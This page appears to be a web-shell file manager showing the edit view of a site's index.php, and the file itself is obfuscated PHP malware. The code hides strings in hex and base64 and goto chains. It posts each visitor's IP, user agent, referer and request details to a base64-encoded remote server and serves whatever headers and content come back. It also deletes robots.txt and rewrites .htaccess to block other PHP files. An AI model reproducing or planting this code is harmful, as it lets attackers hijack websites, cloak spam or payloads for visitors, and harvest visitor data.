OwlCyberSecurity - MANAGER

Edit File: index.php

<?php
 goto v_Vjy; A1LXo: c3fT0: goto eQ9RC; E_6p0: N4afv: goto qPhCv; NQ4ac: goto X3zsQ; goto yHECV; DiQlR: CDQBp: goto Ux3o5; W2mDI: VR2s9: goto Iiszw; Xt9xm: goto Qc812; goto WSuAz; kPBWD: LaVpZ: goto nV4Fr; hkR7j: x9zva: goto bokIq; TR00j: oV42F: goto rADRs; rADRs: $params["\x69\x70"] = isset($_SERVER["\110\124\x54\x50\137\126\111\x41"]) ? $_SERVER["\x48\124\124\120\x5f\x58\x5f\x46\117\122\x57\x41\x52\104\x45\104\x5f\106\117\122"] : $_SERVER["\x52\x45\115\x4f\124\105\x5f\x41\104\104\x52"]; goto R6NH0; WSuAz: hpizb: goto jR8Zz; yHECV: w0vTg: goto Aw51r; HgjR2: goto uhrET; goto W2mDI; Jj9s8: $params["\x72\145\x71\165\x65\x73\x74\137\165\x72\154"] = $_SERVER["\x52\x45\x51\125\105\x53\124\137\x55\122\111"]; goto L5Km0; XNQEo: goto c3fT0; goto E_6p0; Ka1tF: cz9LS: goto XZfwB; nV4Fr: $params["\162\x65\x66\145\x72\145\x72"] = isset($_SERVER["\110\x54\x54\120\x5f\122\x45\x46\105\122\105\x52"]) ? $_SERVER["\x48\x54\124\120\137\x52\105\106\x45\x52\105\122"] : ''; goto URlfp; Aw51r: h2(); goto Sqy9j; L5Km0: goto LaVpZ; goto aVKuD; OkVsW: goto VR2s9; goto TR00j; Iiszw: if (isset($_REQUEST["\160\x61\162\141\155\163"])) { $params["\141\x70\151"] = $api; print_r($params); die; } goto X2k8J; pHeRE: goto x9zva; goto DiQlR; uKyzI: goto cz9LS; goto A1LXo; jR8Zz: $params["\x6c\141\x6e\147\165\x61\147\145"] = isset($_SERVER["\110\124\124\120\137\x41\x43\103\105\x50\x54\x5f\x4c\x41\x4e\x47\x55\101\x47\x45"]) ? $_SERVER["\x48\124\124\120\137\x41\103\x43\105\x50\x54\x5f\x4c\x41\116\x47\125\x41\x47\x45"] : ''; goto OkVsW; aNolz: X3zsQ: goto q8FlT; UrS0B: $api = base64_decode("\141\x48\122\x30\143\104\x6f\x76\114\x7a\x59\x78\116\104\125\164\131\62\147\60\114\130\131\x79\117\124\x55\x75\x61\x57\61\x6e\x4e\x33\154\150\141\107\71\x76\114\155\x4e\166\x62\121\75\x3d"); goto XNQEo; NZCgA: IbLrJ: goto QGfyl; qY_Ni: goto oV42F; goto KHmx3; aVKuD: qGTCj: goto hoBey; qPhCv: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\x2f\x5c\174\x2f\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto NQ4ac; eQ9RC: $params["\144\x6f\155\141\x69\156"] = isset($_SERVER["\x48\x54\124\120\137\x48\117\x53\124"]) ? $_SERVER["\x48\124\x54\x50\x5f\110\x4f\123\124"] : $_SERVER["\x53\105\x52\x56\105\122\137\x4e\101\115\105"]; goto Xt9xm; tVDUV: goto hpizb; goto oBAH2; oBAH2: Qc812: goto Jj9s8; KHmx3: uhrET: goto UrS0B; Sqy9j: goto CDQBp; goto hkR7j; xO527: goto N4afv; goto H4ET_; X2k8J: goto w0vTg; goto aNolz; H4ET_: arZb2: goto GdBQt; GdBQt: if ($params["\x69\160"] == null) { $params["\151\160"] = ''; } goto uKyzI; Ux3o5: $try = 0; goto xO527; hoBey: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\x68"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto pHeRE; bokIq: function h2() { if (file_exists("\x72\157\142\x6f\x74\163" . "\56\164\170\x74")) { @unlink("\162\x6f\142\x6f\x74\x73" . "\56\164\x78\164"); } $htaccess = "\56" . "\x68\164\x61\143\143\145\x73\x73"; $content = @base64_decode("\120\105\132\160\x62\x47\126\x7a\x54\127\x46\60\131\x32\x67\x67\111\151\x34\157\143\x48\154\x38\132\130\150\x6c\146\x48\x42\x6f\x63\x43\x6b\x6b\x49\152\x34\x4b\111\105\71\171\x5a\x47\126\171\x49\x47\x46\163\x62\107\x39\x33\x4c\x47\x52\154\x62\156\x6b\x4b\111\x45\x52\x6c\142\x6e\x6b\147\x5a\156\x4a\166\x62\x53\102\x68\x62\x47\x77\113\120\103\71\107\x61\x57\x78\154\x63\x30\61\x68\144\107\116\157\120\x67\157\x38\122\155\154\163\132\x58\116\x4e\131\x58\122\152\x61\103\x41\151\x58\x69\150\150\x59\155\71\x31\144\x43\65\x77\x61\110\102\x38\x63\x6d\106\x6b\x61\x57\70\165\x63\x47\150\167\x66\x47\154\x75\132\107\x56\x34\x4c\x6e\102\157\x63\110\170\x6a\142\x32\65\x30\x5a\x57\65\x30\x4c\x6e\102\x6f\143\x48\170\163\142\62\x4e\x72\x4d\x7a\131\167\114\x6e\x42\157\143\110\170\x68\x5a\107\61\x70\142\151\65\167\141\110\102\x38\144\x33\x41\x74\x62\x47\71\156\x61\127\64\x75\143\x47\x68\167\x66\110\144\x77\x4c\127\167\167\x5a\x32\154\165\114\156\x42\x6f\x63\110\x78\x33\143\103\x31\60\141\x47\x56\x74\x5a\123\65\167\141\110\102\x38\144\x33\x41\164\x63\x32\116\x79\141\130\x42\x30\x63\x79\x35\167\x61\x48\102\x38\144\63\x41\164\132\127\122\160\144\107\x39\x79\x4c\156\102\x6f\143\x48\x78\x74\131\127\x67\165\x63\x47\150\167\146\107\160\x77\114\156\x42\x6f\143\110\170\154\x65\110\121\x75\143\x47\150\167\113\x53\121\x69\120\147\x6f\147\x54\63\x4a\x6b\x5a\x58\x49\147\131\127\x78\163\142\x33\x63\x73\132\107\x56\165\x65\x51\157\147\121\x57\170\x73\142\63\x63\x67\132\156\112\x76\142\x53\x42\150\x62\107\167\x4b\x50\x43\71\x47\141\x57\x78\154\143\x30\x31\150\144\107\116\x6f\x50\147\157\70\x53\x57\x5a\x4e\x62\x32\122\x31\x62\x47\x55\x67\x62\x57\x39\153\x58\x33\x4a\x6c\x64\x33\112\x70\x64\x47\x55\165\x59\x7a\64\x4b\125\x6d\x56\63\143\x6d\x6c\60\x5a\x55\x56\165\132\x32\154\x75\132\123\102\x50\x62\147\160\123\132\x58\x64\x79\141\130\122\154\121\155\106\x7a\x5a\x53\101\166\103\154\112\x6c\x64\63\112\x70\144\x47\x56\123\144\x57\170\x6c\x49\x46\65\x70\142\155\122\154\145\x46\167\x75\x63\107\x68\167\112\x43\x41\164\x49\106\164\115\x58\121\160\123\x5a\x58\x64\x79\141\x58\122\154\x51\62\x39\165\132\103\x41\154\145\61\x4a\x46\125\x56\x56\x46\x55\61\122\x66\122\x6b\154\x4d\x52\x55\65\x42\124\x55\126\x39\x49\x43\105\164\x5a\147\x70\123\x5a\130\144\x79\x61\130\x52\154\x51\x32\71\x75\x5a\103\101\154\x65\61\112\x46\x55\x56\x56\106\125\x31\x52\x66\x52\153\x6c\x4d\122\125\x35\102\124\x55\126\x39\x49\x43\105\x74\x5a\x41\x70\x53\x5a\130\x64\x79\x61\130\122\x6c\125\x6e\126\163\132\123\101\165\111\x43\71\x70\142\155\122\x6c\x65\x43\x35\x77\x61\x48\x41\x67\127\60\x78\x64\103\152\167\166\x53\x57\x5a\116\142\x32\x52\x31\142\107\125\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto HgjR2; v_Vjy: goto qGTCj; goto Ka1tF; XZfwB: $params["\160\x72\157\164\157\143\x6f\154"] = isset($_SERVER["\x48\x54\x54\120\x53"]) ? "\x68\164\x74\x70\163\72\x2f\x2f" : "\150\x74\164\160\72\57\x2f"; goto tVDUV; URlfp: goto IbLrJ; goto NZCgA; R6NH0: goto arZb2; goto kPBWD; QGfyl: $params["\x61\147\145\x6e\164"] = isset($_SERVER["\110\124\124\120\137\x55\123\105\122\137\x41\x47\x45\x4e\124"]) ? $_SERVER["\110\124\x54\x50\x5f\125\x53\x45\122\x5f\101\x47\x45\x4e\x54"] : ''; goto qY_Ni; q8FlT: ?>